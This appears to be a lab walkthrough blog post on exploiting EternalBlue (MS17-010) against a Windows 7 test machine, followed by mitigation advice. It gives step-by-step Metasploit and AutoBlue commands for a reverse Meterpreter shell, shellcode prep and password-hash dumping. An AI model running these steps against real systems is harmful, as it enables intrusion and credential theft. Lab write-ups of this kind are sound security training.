Exploiting EternalBlue (MS17-010): A Walkthrough and Protection Measures
Table of Contents
Exploiting EternalBlue (MS17-010): A Walkthrough and Protection Measures #
In this article, we will explore one of the most notorious vulnerabilities in recent history: EternalBlue (MS17-010). This exploit allows attackers to execute remote code on Windows systems, particularly those running the SMB protocol. We’ll examine the mechanics of the vulnerability, provide a detailed walkthrough of exploiting a Blue machine running Windows 7 Ultimate, and discuss best practices for mitigating the risks associated with this vulnerability.

Understanding EternalBlue #
EternalBlue is an exploit developed by the NSA and leaked by the Shadow Brokers in 2017. It targets a flaw in Microsoft’s implementation of the SMB protocol, specifically versions 1.0, enabling attackers to send specially designed packets to a vulnerable system. This exploit gained notoriety due to its use in the WannaCry ransomware attack, which caused widespread damage across the globe.
Key Characteristics #
- Vulnerability ID: MS17-010
- CVE Identifiers:
- CVE-2017-0144: Related to remote code execution through the SMBv1 protocol.
- CVE-2017-0145: Related vulnerability affecting the SMB protocol.
- CVE-2017-0146: Another associated vulnerability.
- Affected Systems: Windows 7, Windows Server 2008, and earlier versions with SMB v1 enabled.
- Impact: Remote Code Execution, allowing attackers to gain full control of the system.
Initial Reconnaissance #
To assess the target, I performed a comprehensive nmap scan on all ports:
sudo nmap -p- 192.168.17.135 -oN nmap.txt

Subsequent scans provided detailed service information about open ports, particularly noting the SMB service on the Windows 7 Ultimate OS:
sudo nmap -p- -A -T4 192.168.17.135 -oN nmap.txt

Identifying Exploitation Opportunities #
A search for known exploits targeting Windows 7 Ultimate systems yielded useful information for both manual and automated exploitation:

Automated Exploit via Metasploit: The Rapid7 site provided an exploit module suitable for our needs, specifically targeting MS17-010.
Local Privilege Escalation: Another exploit could be leveraged for privilege escalation once we gain access to the machine.
Manual Exploit: A Python-based exploit also met the criteria for the vulnerability.
Understanding the Vulnerability #
To further comprehend MS17-010, I consulted Microsoft’s security bulletin, which outlines the vulnerability’s impact and mitigation strategies:
Microsoft Security Bulletin MS17-010 - Critical
Automated Exploitation with Metasploit #
I initiated the exploitation process by launching Metasploit and searching for relevant modules:
msfconsole
search eternalblue

Next, I identified an auxiliary SMB scanner module to verify if the target was vulnerable. I selected option 3 and configured the required settings:
use 3
options

After running the scan, the results indicated a vulnerability to MS17-010:
setg RHOSTS 192.168.17.135
run

I then proceeded to find the appropriate exploit module for MS17-010:
use 0

Before executing the exploit, I verified that all required options were set, ensuring to specify the LHOST IP address of my attacker machine:
options

To further confirm the target’s vulnerability, I executed:
check

I then set the payload for a 64-bit reverse TCP Meterpreter shell:
set payload windows/x64/meterpreter/reverse_tcp
run

Upon successful exploitation, I established a Meterpreter session on the target machine:

Post-Exploitation: Extracting Password Hashes #
With the session active, I executed the hashdump command to retrieve password hashes from the system:
hashdump
This command provided the administrator account’s password hash, enabling further actions using tools like Hashcat or John the Ripper to crack the password and gain elevated access.

Manual Exploitation #
An additional Google search for EternalBlue exploits lead to the disocvery of this particular exploit that seems easier to achieve our goal:
I cloned this repo to the /opt directory on my Kali machine:
sudo git clone https://github.com/3ndG4me/AutoBlue-MS17-010.git
cd AutoBlue-MS17-010

Next, I implemented the requirements per the directions listed on the repo to meet the Python 3 requirement:
pip install -r requirements.txt

Running the checker, we see that the target is not patched and, therefore, vulnerable, to this exploit.
python eternal_checker.py 192.168.17.135

Next, I navigated to the shellcode directory to execute the shell prep script and provided the following inputs for the Eternal Blue Windows Shellcode Compiler:
cd shellcode
sudo ./shell_prep.sh
192.168.17.134 # LHOST for reverse connection
9999 # LPORT for x64
2222 # LPORT for x86
1 # Type 1 for a regular staged cmd shell
0 # Type 0 for a Meterpreter shell

Listener Prep #
Next, I executed the listener prep script to provide the configuration settings needed to establish a listener in Metasploit that would accept incoming connections from the target machine once the exploit is executed.
cd ..
sudo ./listener_prep.sh

Time to run the exploit: #
python eternalblue_exploit7.py 192.168.17.135 shellcode/sc_all.bin

In this case, the exploit crashed the target machine, resulting in the Blue screen:

Mitigation Strategies #
To protect against the exploitation of EternalBlue, organizations and individuals should implement the following strategies:
- Patch Systems: Regularly apply security updates and patches provided by Microsoft. The patch for MS17-010 was released in March 2017; ensure it is installed on all systems.
- Disable SMBv1: As SMBv1 is outdated and insecure, disable it on all systems unless absolutely necessary.
- Network Segmentation: Isolate critical systems from general access. Implement strict firewall rules to limit SMB traffic.
- Intrusion Detection Systems (IDS): Utilize IDS to monitor for suspicious traffic patterns indicative of an EternalBlue exploit attempt.
- Regular Backups: Maintain regular backups of critical data to mitigate the impact of ransomware attacks.
The Eternal Blue vulnerability continues to pose significant risks to unpatched systems. Through a combination of effective reconnaissance and exploitation techniques, this walkthrough demonstrates the process of compromising a vulnerable Windows 7 machine. To protect against such vulnerabilities, regular patching, proper configuration, and monitoring are essential.


